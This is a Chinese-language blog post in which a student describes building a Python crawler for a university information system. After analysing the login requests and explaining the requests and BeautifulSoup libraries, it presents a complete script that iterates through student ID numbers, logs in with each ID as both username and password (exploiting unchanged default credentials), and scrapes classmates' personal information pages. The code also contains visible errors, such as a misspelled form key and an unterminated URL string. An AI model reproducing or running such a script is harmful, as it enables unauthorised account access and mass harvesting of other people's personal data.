Python编程实践学习--模拟登录爬取信息 · Uknow

前言

最近在安全牛看《简单学python安全》这套视频教材，然后自己也想写个小东西，恰巧学习的一个信息系统，同学们的账号密码都是默认的，而且没有验证码，相对简单。所以就开始了这个小脚本的编写历程。这个过程中遇到了不少问题，请教了学长，在学长的帮助和指导下完成。在此回顾总结下这次过程。

正文

抓包分析

一开始自己抓包分析的时候，出现了一些问题。登录过程分析得不够严谨，以致于模拟登录的时候出现不能登录上去的问题，后来学长帮我分析了下。原来这个模拟登录过程需要两个POST请求过程，而在这个过程中之前我使用的是urllib这个库来模拟登录，在学长的提示下使用request这个相较于urllib先进的库

第一个POST包

POST /renzheng.jsp HTTP/1.1
Host: xxxx.xxxx.edu.cn
Content-Length: 142
Cache-Control: max-age=0
Origin: http://xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14&operType=911&random_form=-1048366953725273893&userName=xxxxx&passwd=xxxxx

从第一个包可以看出PostData部分由9各部分组成其中：
displayName、displayPasswd默认是空的
select、submit.x、submit.y这三个参数中，select是用户类型，如果是教师用户select=1,如果是学生用户select=2。submit.x、submit.y分别代表鼠标点击的坐标
operType、random_form这两个个参数中，operType默认为911，random_form是一个随机数字串
userName、passwd这两个参数是账号密码，明文传输

第二个POST包

POST /servlet/adminservlet HTTP/1.1
Host: xxxx.xxxx.edu.cn
Content-Length: 65
Cache-Control: max-age=0
Origin: http://xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn/renzheng.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

isValidate=false&userName=xxxxx&passwd=xxxxx&operType=911

看Referer可以看出这个包是由第一个包的页面跳转过来的
userName、passwd这两个参数是账号密码，明文传输
isValidate默认为false
operType默认为911

爬取页面GET包

GET /student/studentInfo.jsp?userName=xxxx&passwd=xxxxx HTTP/1.1
Host: xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn/servlet/adminservlet
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

看Referer可以看出这个包是由第二个包的页面跳转过来的
userName、passwd这两个参数是账号密码，明文传输

模拟构造请求包

在写Python代码的过程我尝试着用了面向对象的过程，把相关变量定义为私有变量，在模拟登录的过程中使用到了Requests模块

__header = {
			'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
			'Content-Type':'application/x-www-form-urlencoded',
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
			'Referer': 'http://xxxx.xxxx.edu.cn/',
			'Accept-Encoding': 'gzip, deflate',
			'Accept-Language': 'zh-CN,zh;q=0.8'
	}
__data1 = {
			'displayName' : '',
	  		'displayPasswd' : '',
	  		'select': '2',
	  		'submit.x': '43',
	  		'submit.y' : '12',
	  		'operType' : '911',
	  		'random_form' : '5129319019753764987',
	 		'userName' : '',
	 		'passwd' : ''
	}
__data2 = {
			'isValidate':'false',
			'userName':'',
			'passwd':'',
			'operType':'911',
	}
__posturl1 = 'http://xxxx.xxxx.edu.cn/renzheng.jsp'
__posturl2 = 'http://xxxx.xxxx.edu.cn/servlet/adminservlet'

__geturl = 'http://xxxx.xxxx.edu.cn/student/studentInfo.jsp?userName=&passwd='

Requests库

Requests是一个Python HTTP库，提供了很多与HTTP相关的方法，我们可以使用dir(requests)查看该库提供的方法

1
2
3

>>> import requests
>>> dir(requests)
['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedRequest', 'Request', 'RequestException', 'Response', 'Session', 'Timeout', 'TooManyRedirects', 'URLRequired', '__author__', '__build__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__path__', '__title__', '__version__', 'adapters', 'api', 'auth', 'certs', 'codes', 'compat', 'cookies', 'delete', 'exceptions', 'get', 'head', 'hooks', 'logging', 'models', 'options', 'patch', 'post', 'put', 'request', 'session', 'sessions', 'status_codes', 'structures', 'utils']

在这次过程中主要使用到了Session、get、post和content这几种方法

Session会话对象

会话对象让你能够跨请求保持某些参数。它也会在同一个 Session 实例发出的所有请求之间保持 cookie

1 2	>>> s = requests.Session() >>> r = s.get("https://uknowsec.cn/")

GET提交方式

以GET提交方式请求响应的URL

1	>>> r = requests.get("https://uknowsec.cn/",proxies=proxies,timeout=0.001,params=payload)

params为GET提交方式传递参数

1	r = requests.get("http://httpbin.org/get", params=payload)

proxies如果需要使用代理，你可以通过为任意请求方法提供 proxies 参数来配置单个请求:

import requests

proxies = {
  "http": "http://10.10.1.10:3128",
  "https": "http://10.10.1.10:1080",
}

requests.get("http://example.org", proxies=proxies)

requests在经过以 timeout 参数设定的秒数时间之后停止等待响应:

>>> requests.get('http://github.com', timeout=0.001)
Traceback (most recent call last):
  File "", line 1, in 
requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)

POST提交方式

以GET提交方式请求响应的URL

1	requests.post("http://example.org", header=header, data=data)

header是需要的header头部信息

header头部信息

此处我们只需要添加常见的常见的部分即可

'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer': 'http://xxxx.xxxx.edu.cn/',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8'

data为Post提交的信息

'displayName' : '',
'displayPasswd' : '',
'select': '2',
'submit.x': '43',
'submit.y' : '12',
'operType' : '911',
'random_form' : '5129319019753764987',
'userName' : '',
'passwd' : ''

Request部分代码

def Firstlogin(self):
	Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

def Secondlogin(self):
	Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)

BeautifulSoup库

BeautifulSoup是一个可以从HTML或XML文件中提取数据的Python库.它能够通过你喜欢的转换器实现惯用的文档导航,查找,修改文档的方式,同样可使用dir()查看BeautifulSoup的方法

1
2
3

>>> import BeautifulSoup
>>> dir(BeautifulSoup)
['BeautifulSOAP', 'BeautifulSoup', 'BeautifulStoneSoup', 'CData', 'Comment', 'DEFAULT_OUTPUT_ENCODING', 'Declaration', 'ICantBelieveItsBeautifulSoup', 'MinimalSoup', 'NavigableString', 'PageElement', 'ProcessingInstruction', 'ResultSet', 'RobustHTMLParser', 'RobustInsanelyWackAssHTMLParser', 'RobustWackAssHTMLParser', 'RobustXMLParser', 'SGMLParseError', 'SGMLParser', 'SimplifyingSOAPParser', 'SoupStrainer', 'StopParsing', 'Tag', 'UnicodeDammit', '__author__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__version__', '_match_css_class', 'buildTagMap', 'chardet', 'codecs', 'generators', 'markupbase', 'name2codepoint', 're', 'sgmllib', 'types']

解析成XML

默认情况下,Beautiful Soup会将当前文档作为HTML格式解析,如果要解析XML文档,要在 BeautifulSoup 构造方法中加入第二个参数 “xml”:

1	soup = BeautifulSoup(markup, "xml")

find_all()

find_all() 方法将返回文档中符合条件的所有tag,返回结果是值包含一个元素的列表
在实践的过程中由于需要的信息是一个包含在一个tables标签下，由于返回的是列表，利用索引定位到响应的tr位置，而后for循环输出td的内容
循环输出tables的代码如下：

tables = soup.findAll('table')  
tab = tables[0]  
for tr in tab.findAll('tr'):  
    for td in tr.findAll('td'):  
        print td.getText(),

Python中逗号的作用

在find_all()方法循环输出一个table用到了一个逗号，而后了解到了逗号在Python有特殊的作用

逗号在参数传递中的使用，作为参数的分隔符
例如def abc(a,b)或者abc(1,2)
逗号在类型转化中的使用, 只有当b元组中只有一个元素的时候 ,需要逗号来转换为元组类型
1
2
3
4
5
6
7
8
9
10
11
12
13
>>> a=11
>>> b=(a)
>>> b
11
>>> b=(a,)
>>> b
(11,)
>>> b=(a,22)
>>> b
(11, 22)
>>> b=(a,22,)
>>> b
(11, 22)
逗号在输出语句print中的妙用:print语句默认的会在后面加上换行,加了逗号之后,换行就变成了空格


for i in range(0,5):
		print i

0
1
2
3
4

 for i in range(0,5):
		print i,

0 1 2 3 4

BeautifulSoup部分代码

Thirdrequest = self.__session.get(geturl)
	page = Thirdrequest.content
	soup = BeautifulSoup(page,"lxml")
tr = soup.findAll('tr')
for i in range(5,14):
	for td in tr[i].findAll('td'):
		print  td.getText(),

异常处理

捕捉异常可以使用try/except语句。
try/except语句用来检测try语句块中的错误，从而让except语句捕获异常信息并处理。
如果你不想在异常发生时结束你的程序，只需在try里捕获它。

try:
<语句>        #运行别的代码
except <名字>：
<语句>        #如果在try部份引发了'name'异常
except <名字>，<数据>:
<语句>        #如果引发了'name'异常，获得附加的数据
else:
<语句>        #如果没有异常发生

使用except而不带任何异常类型

try:
    正常的操作
   ......................
except:
    发生异常，执行这块代码
   ......................
else:
    如果没有异常执行这块代码

使用except而带多种异常类型

try:
    正常的操作
   ......................
except(Exception1[, Exception2[,...ExceptionN]]]):
   发生以上多个异常中的一个，执行这块代码
   ......................
else:
    如果没有异常执行这块代码

try-finally 语句

try:
<语句>
finally:
<语句>    #退出try时总会执行
raise

效果图

完整代码

# -*- coding: utf-8 -*-
# !/usr/bin/python

import requests
import time
import os
from bs4 import BeautifulSoup



class UCrawler(object):
	"""docstring for UCrawler"""
	__header = {
				'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
				'Content-Type':'application/x-www-form-urlencoded',
				'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
				'Referer': 'http://xxxx.xxxx.edu.cn/',
				'Accept-Encoding': 'gzip, deflate',
				'Accept-Language': 'zh-CN,zh;q=0.8'
		}
	__data1 = {
				'displayName' : '',
		  		'displayPasswd' : '',
		  		'select': '2',
		  		'submit.x': '43',
		  		'submit.y' : '12',
		  		'operType' : '911',
		  		'random_form' : '5129319019753764987',
		 		'userName' : 'xxxxxxx',
		 		'passwd' : 'xxxxxxx'
		}
	__data2 = {
				'isValidate':'false',
				'userName':'xxxxxxx',
				'passwd':'xxxxxxx',
				'operType':'911',
		}
	__posturl1 = 'http://xxxx.xxxx.edu.cn/renzheng.jsp'
	__posturl2 = 'http://xxxx.xxxx.edu.cn/servlet/adminservlet'


	__session=requests.Session()

	def Firstlogin(self):
		Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

	def Secondlogin(self):
		Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)


	def PrintAndGet(self):
		a = range(xxxxxxxx,xxxxxxx)
		for tmp in a:
			try:
				username = str(tmp)
				password = str(tmp)
				self.__data1['userNam']=username
				self.__data1['passwd']=password
				self.__data2['userNam']=username
				self.__data2['passwd']=password
				Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)
				Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)
				geturl = http://xxxx.xxxx.edu.cn/student/studentInfo.jsp?userName'+'='+username+'&'+'passwd='+password


				print '\n'
			except IndexError:
				continue

if __name__ == '__main__':

	U = UCrawler()
	U.Firstlogin()
	U.Secondlogin()
	U.PrintAndGet()

总结

这个编写过程还是蛮久的，毕竟自己的水平太low了，一边找资料一边写代码，然后查相关的知识点。还多次问学长一些很傻逼的问题，贼尴尬有没有，不过学长还是耐心的教我解决问题，在这个过程中学到很多Python的知识，包括相关的库的使用，常见的问题，异常处理等等方面。另外这整个过程中，可能对系统进行了很多次访问，在此表示歉意，并无恶意只是测试而已。